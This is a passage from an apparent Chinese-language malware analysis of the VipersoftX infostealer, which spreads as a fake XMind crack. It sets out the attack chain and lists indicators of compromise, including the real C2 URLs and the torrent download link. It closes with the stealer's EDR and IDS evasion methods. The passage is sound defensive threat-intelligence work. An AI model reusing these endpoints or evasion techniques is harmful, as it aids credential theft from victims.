未发现异常,这里应该是阿里的沙箱之类的操作,尝试外联的;(如下图,这两年分析红队样本的时候,总是遇到下面这个arphaCrashReport.exe来做白加黑绕过终端防护设备,一直没找到出处,原来使阿里edr上的组件,这也算是解了我两年来的一个疑惑了,颇有他乡遇故知的意思~~)

image-20240511112307147

0x03 总结

一、攻击链梳理

VipersoftX窃密木马伪装成Xmind破解插件置于www.1377x.to,诱使用户下载,运行后,释放运行恶意第一阶段ps脚本,并通过计划任务、注册表和文件实现持久化;第一阶段脚本会拉取特定路径缓存文件和特定路径注册表值作为代码执行;然后通过请求解析内置的一个list域名((wmail|fairu|bideo|privatproxy|ahoravideo)-(endpoint|blog|chat|cdn|schnellvpn).(com|xyz))的dns-txt记录,获取后的数据先使用内置的rsa公钥进行签名校验,接着解密拿到第二阶段的代码,并通过powershell反射调用执行;然后获取主机相关信息构造唯一id,带着唯一id回连c2:xboxwindows.com特定url,解密返回数据获取第三阶段代码,并执行;拉取受害机器的相关浏览器应用和插件安装情况以及密码管理软件等相关信息,带着这些信息回连c2:xboxwindows.com特定url,开展进一步的利用;

攻击链路图如下:

image-20240515183528287

二、ioc:

域名:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
wmail-endpoint.com
wmail-endpoint.xyz
wmail-blog.com
wmail-blog.xyz
wmail-chat.com
wmail-chat.xyz
wmail-cdn.com
wmail-cdn.xyz
wmail-schnellvpn.com
wmail-schnellvpn.xyz
fairu-endpoint.com
fairu-endpoint.xyz
fairu-blog.com
fairu-blog.xyz
fairu-chat.com
fairu-chat.xyz
fairu-cdn.com
fairu-cdn.xyz
fairu-schnellvpn.com
fairu-schnellvpn.xyz
bideo-endpoint.com
bideo-endpoint.xyz
bideo-blog.com
bideo-blog.xyz
bideo-chat.com
bideo-cdn.com
bideo-cdn.xyz
bideo-schnellvpn.com
bideo-schnellvpn.xyz
privatproxy-endpoint.com
privatproxy-endpoint.xyz
privatproxy-blog.com
privatproxy-blog.xyz
privatproxy-chat.com
privatproxy-chat.xyz
privatproxy-cdn.com
privatproxy-cdn.xyz
privatproxy-schnellvpn.com
privatproxy-schnellvpn.xyz
ahoravideo-endpoint.com
ahoravideo-endpoint.xyz
ahoravideo-blog.com
ahoravideo-blog.xyz
ahoravideo-chat.com
ahoravideo-chat.xyz
ahoravideo-cdn.com
ahoravideo-cdn.xyz
ahoravideo-schnellvpn.xyz

url:

1
2
3
http://xboxwindows.com/api/v1/$guid
http://xboxwindows.com/api/$guid
https://www.1377x.to/torrent/5505841/XMind-2022-v22-11-2677-x64-Multilingual-crack-crackerfg/

hash_md5:

1
2
2656a4f7c113ac37df603a3c27f0ea0c
157683de4c4cbedcb74d8d66581217a7

计划任务:

1
\Microsoft\Windows\Diagnosis\RecommendedTroubleshootingScanner[0-9a-z]{5}

注册表:

1
2
HKEY_LOCAL_MACHINE\SOFTWARE\SolidWorks CorporationJQVQJ\c8dO7TYiv 
HKEY_LOCAL_MACHINE\SOFTWARE\SolidWorks Corporation 修改而来

文件:

1
2
c:/windows/system32/[0-9A-Z]{4}.tmp
c:/windows/system32/[0-9A-Z]{4}.tmp/[0-9A-Z]{4}.ps1

0x04 学习

通过此次分析,我们不难看出这种有一定规模的窃密组织,其整个杀伤链中还是做了很多对抗分析的和检测的手段;

1、payload加密混淆并隐藏到注册表键值中:通过注册表逃避edr的扫描和检测;

2、云端payload拉取采用dns隧道:通过txt记录传输加密payload,逃避ids流量监测;

3、对抗域名被接管情况:通过内置批量域名,并且对payload进行签名,客户端对签名进行校验,从而逃避被接管,对抗研究分析冉渊;

4、分阶段payload加载:通过多阶段从而拉长进程链,逃避edr检测;

5、payload反射加载:通过powershel独有的invoke反射加载,逃避edr检测;